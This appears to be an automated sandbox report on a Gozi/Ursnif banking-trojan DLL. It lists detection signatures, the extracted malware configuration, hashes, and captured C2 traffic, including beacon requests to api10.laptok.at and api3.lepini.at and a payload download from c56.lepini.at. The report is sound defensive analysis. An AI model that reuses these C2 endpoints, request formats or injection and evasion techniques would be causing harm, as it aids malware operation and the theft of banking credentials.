Analysis Report SecuriteInfo.com.Generic.mg.81f401defa8faa2e.14295

Overview

General Information

Sample Name: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.14295 (renamed file extension from 14295 to dll)
Analysis ID: 343096
MD5: 81f401defa8faa2e4745590bc4f6c008
SHA1: bddb75a5aa6ed1272307ee096b59e2e61076a6f9
SHA256: 74cc533238ae33245519b52784db0e6adbd3380b350717fdc69d4e36714173d5

Most interesting Screenshot:

Detection

Gozi Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Gozi e-Banking trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: regsvr32.exe.2628.2.memstr Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "401", "system": "ad51e028b41086c1a9f4c3463eb17f2ehh", "size": "201292", "crc": "2", "action": "00000000", "id": "3300", "time": "1611307439", "user": "902d52678695dc15e71ab15cd837ada4", "hash": "0xa6ea74ae", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: c56.lepini.at Virustotal: Detection: 8% Perma Link
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Virustotal: Detection: 33% Perma Link
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll ReversingLabs: Detection: 25%

Compliance:

barindex
Uses 32bit PE files
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49761 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001D.00000002.925789248.000002946AE90000.00000002.00000001.sdmp, csc.exe, 00000020.00000002.938527540.000001F33B7D0000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000024.00000002.1051265243.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: \fk.pdb$. source: powershell.exe, 0000001A.00000003.995503256.000001E7C3283000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000002.00000003.944587452.00000000064F0000.00000004.00000001.sdmp
Source: Binary string: c:\climbThrough\Bedclear\ranCentury\Exercise.pdb source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000002.00000003.944587452.00000000064F0000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000024.00000002.1051265243.0000000005A00000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FC4FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 2_2_05FC4FE1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FAE0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 2_2_05FAE0BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 2_2_05FB888D
Source: C:\Windows\explorer.exe Code function: 36_2_04DAECE0 RtlAllocateHeap,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose, 36_2_04DAECE0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB05EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 2_2_05FB05EF

Networking:

barindex
Uses ping.exe to check the status of other devices and networks
Source: unknown Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 151.101.1.44 151.101.1.44
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: global traffic HTTP traffic detected: GET /api1/sknLedsCbT_2B4wLtS_2FSf/C8Q4jriZvv/cHfqhQ9vl0vZGO5GP/AoJz8AHspssc/PRZs4sKJRg7/jH1SdHxUwyz5RQ/XuBuvpY5vvQV4LqIVVPRo/Z9PjsLKqohem6vf_/2FPMNyhDVIs00yE/BuUcdk1zY69hPWFKWm/NvZlHdA31/78WizcFNxnStriaFjzK7/v_2FVVwIwtM_2F54f79/vZDSa6ivA8gkZONEyW9488/C4H0pr8tv19LW/ZXxXdBMw/kw85mxmCjJ_2Bu32ObSyLwF/Yo3etxqqFR/p7BRLvnXvFdgAAGGn/C_2BCacpFUZ1/tah HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/8t0bR6VsCGA/ZdsVj6T4k_2FoN/BLdu_2BpSFXqKfcNrQm0V/ev0hudV9ITNV8_2B/N1NUzrdZB3VXtwr/czINvqLVnHAqL34hBx/_2F4Uw8ch/lO8_2BdQScLQi_2B7dkM/Y6U5VEgT5klQ01W1Rxk/oP4yI983nfNNLWO0FdmkwO/SlYApRJyCflSJ/F9Sp1wFu/11p6fGFU0cz_2F0ouRmTqJI/Jp2cYIM8B8/Yut84Zr03wWkVJ8HW/_2Bs4q032lo5/cXLpMBT2Oue/wmMCk0Do0CwkFa/R5_2BwVrdhg4SycoUpM1q/WdY_2FMtLacKdQm6/_2B87YclJ9Jv74j/B_2BPGCFKoDrv4QA/twu HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/CVkO0YtaI5O0rIFRU/dT4qwboWJixM/lD45ufaeNnI/cacgVxu7PaX2PX/1lYOIQMGvnkM47oJxaNOf/hFcn44i0YUVm90w4/QXHrnAASK_2F13d/5oQ_2F_2FIecjTnC8w/7KFf5o_2B/DvKXcUwkTj3k34oyPZ_2/BQTne0TWIY5r0yyHLCZ/QdvKBv0OKuZfpJiCfSiXDe/gwqygzT9hF5O5/iOEj4dxL/R_2FX_2Fv0bMpcldKbASVEW/DM59OBVxq7/9d4nMpuM8bNhV0TMy/RR84HPz6HIaw/UUGT2Q4OKHA/IoB4n4vcvYeMKu/tNuRkRQ0aDraFPOIy8Iid/GXrqJWUbrs/H HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/qid4UkFjrmJwDqv1uGoy3/_2BUJEVRCzS4dgw_/2BQScQk8a3HbiWi/d_2FOUrdxgv_2FzWHk/Apf0FwjNI/XCjSe3QcK9lg8PEDHYq_/2BEZPUJgDqlWZMm5T6e/5VAYvXDHpTHy9yII7VkiV8/_2BPKcMGMz7Ef/Vq5I_2Bu/jg1FflNR1bMph_2B7mMw8J7/1wxMorc_2F/N6CisPjn0a1IvUWNq/qjvzUpOhQ3cR/g18ZLbBaZpr/HqIkmdt9eu1lN1/4tABZghNsoNFyNad4ZlYW/GQkzB4t48KvSwznE/J6JNvAHQJAsplh2/rVWvzj4OOGDDMz5k/E HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
Source: de-ch[1].htm.5.dr String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: msapplication.xml0.4.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x2ac1dc45,0x01d6f0a0</date><accdate>0x2ac1dc45,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.4.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x2ac1dc45,0x01d6f0a0</date><accdate>0x2ac1dc45,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.4.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x2ac43e92,0x01d6f0a0</date><accdate>0x2ac43e92,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.4.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x2ac43e92,0x01d6f0a0</date><accdate>0x2ac43e92,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.4.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x2ac6a0e0,0x01d6f0a0</date><accdate>0x2ac6a0e0,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.4.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x2ac6a0e0,0x01d6f0a0</date><accdate>0x2ac6a0e0,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: de-ch[1].htm.5.dr String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen|https://twitter.com/i/notifications;Ich|#;Abmelden|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
Source: de-ch[1].htm.5.dr String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"&nbsp;&nbsp;&nbsp;Ref 2: "+e.html(t.clientSettings.sid||"000000")+"&nbsp;&nbsp;&nbsp;Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console||{}).timeStamp?console.timeStamp(n):(r.performance||{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen|https://outlook.live.com/mail/deeplink/compose;Kalender|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: www.msn.com
Source: unknown HTTP traffic detected: POST /api1/Ct0R_2Fx9NzTLjO/AAVczaEeXM_2F0PHvI/q2A7GpbWq/QRkIGlX7lHetqaCvuTxL/ZcPM1sCMitgD7TpJ4lL/YaaCrfmGr7HSdfEDFBfZy_/2F6yiEd5nRfk_/2FyBL0Qi/YvC2A5PzJxWwGDWFfurX0IH/Pl4gbL8NNR/pL5PpYu5LBw4qrHSp/5GLoVTygQHxi/lMsRYGiVP_2/BVFS_2BKJaP3UA/ShYtgHcZ3ceFWWHUPV6JY/AjkOe7pkq3uVlpG4/TAfeBct56eabx37/kmJm57Oum_2FZFTOYP/K3KMyMRiN/6VsuEdtgXSIPx_2FOzhO/Wfirq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Content-Length: 2Host: api3.lepini.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Jan 2021 09:23:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: explorer.exe, 00000024.00000000.976375731.0000000006AD0000.00000002.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: {8A523B9D-5C93-11EB-90EB-ECF4BBEA1588}.dat.4.dr, ~DF4F2ABC3EEE61E1AD.TMP.4.dr String found in binary or memory: http://api10.laptok.at/api1/8t0bR6VsCGA/ZdsVj6T4k_2FoN/BLdu_2BpSFXqKfcNrQm0V/ev0hudV9ITNV8_2B/N1NUzr
Source: explorer.exe, 00000024.00000002.1037964161.0000000001080000.00000002.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/CVkO0YtaI5O0rIFRU/dT4qwboWJixM/lD45ufaeNnI/cacgVxu7PaX2PX/1lYOIQMGv
Source: {92E377B0-5C93-11EB-90EB-ECF4BBEA1588}.dat.4.dr, ~DF52531A3CB90001E8.TMP.4.dr String found in binary or memory: http://api10.laptok.at/api1/CVkO0YtaI5O0rIFRU/dT4qwboWJixM/lD45ufaeNnI/cacgVxu7PaX2PX/1lYOIQMGvnkM47
Source: explorer.exe, 00000024.00000000.981670591.000000000A897000.00000004.00000001.sdmp, ~DF703176632CAC7978.TMP.4.dr String found in binary or memory: http://api10.laptok.at/api1/sknLedsCbT_2B4wLtS_2FSf/C8Q4jriZvv/cHfqhQ9vl0vZGO5GP/AoJz8AHspssc/PRZs4s
Source: explorer.exe, 00000024.00000002.1048815971.0000000004710000.00000004.00000001.sdmp String found in binary or memory: http://api3.lepini.at/api1/Ct0R_2Fx9NzTLjO/AAVczaEeXM_2F0PHvI/q2A7GpbWq/QRkIGlX7lHetqaCvuTxL/ZcPM1sC
Source: explorer.exe, 00000024.00000002.1048815971.0000000004710000.00000004.00000001.sdmp String found in binary or memory: http://api3.lepini.at/api1/Y90IJ6cExB9qSgb/oNO0xdo8DXz1Gn7txC/ImxUnG_2B/FZLeWtZNMElpVIuMqsnD/ao9u_2B
Source: explorer.exe, 00000024.00000002.1048815971.0000000004710000.00000004.00000001.sdmp String found in binary or memory: http://api3.lepini.at/api1/qid4UkFjrmJwDqv1uGoy3/_2BUJEVRCzS4dgw_/2BQScQk8a3HbiWi/d_2FOUrdxgv_2FzWHk
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.976375731.0000000006AD0000.00000002.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
